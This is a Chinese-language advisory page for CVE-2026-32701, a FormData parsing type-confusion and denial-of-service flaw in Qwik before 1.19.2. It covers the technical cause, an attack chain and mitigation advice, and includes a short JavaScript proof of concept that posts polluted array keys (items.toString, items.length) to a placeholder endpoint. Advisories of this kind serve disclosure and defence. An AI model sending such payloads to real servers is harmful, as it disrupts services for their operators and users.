CVE-2026-32701 CVSS 7.5 高危

CVE-2026-32701 Qwik FormData解析类型混淆漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32701

漏洞类型

类型混淆, 拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Qwik

漏洞概述

Qwik框架在1.19.2版本之前存在FormData解析缺陷，错误地将点号字段名推断为数组。攻击者通过提交混合的数组索引和对象属性键，可将用户控制的属性写入服务器端预期为数组的值中，导致请求处理失败、拒绝服务或类型混淆。

技术细节

该漏洞源于Qwik City在处理`application/x-www-form-urlencoded`或`multipart/form-data`请求时的解析逻辑。当解析器遇到类似`items.0`的点号字段名时，会将其转换为嵌套数组结构。然而，解析器未能严格区分数组索引和对象属性。攻击者可构造包含`items.toString`、`items.push`或`items.length`等键的恶意请求。由于JavaScript数组本质也是对象，这些键会污染数组对象，导致后续应用代码在操作该结构时发生逻辑错误或崩溃，从而引发拒绝服务。

攻击链分析

STEP 1

侦察

识别目标应用是否使用了Qwik框架且版本低于1.19.2。

STEP 2

构造Payload

攻击者构造HTTP POST请求，在FormData中混合使用数组索引（如items.0）和对象属性键（如items.toString）。

STEP 3

发送请求

将构造好的恶意请求发送至服务器端点，触发FormData解析逻辑。

STEP 4

利用漏洞

服务器错误地将对象属性注入数组结构，导致应用代码在处理该数据时发生类型混淆、异常或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-32701
// Conceptual payload to pollute array properties via FormData

// Scenario: Sending a POST request to a vulnerable Qwik City endpoint

const formData = new FormData();

// Normal array indices
formData.append('items.0', 'item1');
formData.append('items.1', 'item2');

// Malicious object properties injected into the array path
// These may override Array.prototype methods or properties
formData.append('items.toString', 'HACKED');
formData.append('items.length', '99999');
formData.append('items.push', 'unexpected_value');

// Send the request
fetch('https://target-vulnerable-endpoint.com/api/submit', {
    method: 'POST',
    body: formData
}).then(response => console.log('Request sent'));

// Server-side result (conceptual):
// The parsed object 'items' might look like:
// {
//   0: 'item1',
//   1: 'item2',
//   toString: 'HACKED',
//   length: '99999',
//   push: 'unexpected_value'
// }
// This causes type confusion when the app tries to use .push() or access .length.

影响范围

Qwik < 1.19.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议在服务端逻辑中增加对FormData解析结果的清洗步骤，确保被解释为数组的对象不包含非数字索引的额外属性（如toString, push, length等），以防止类型混淆。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表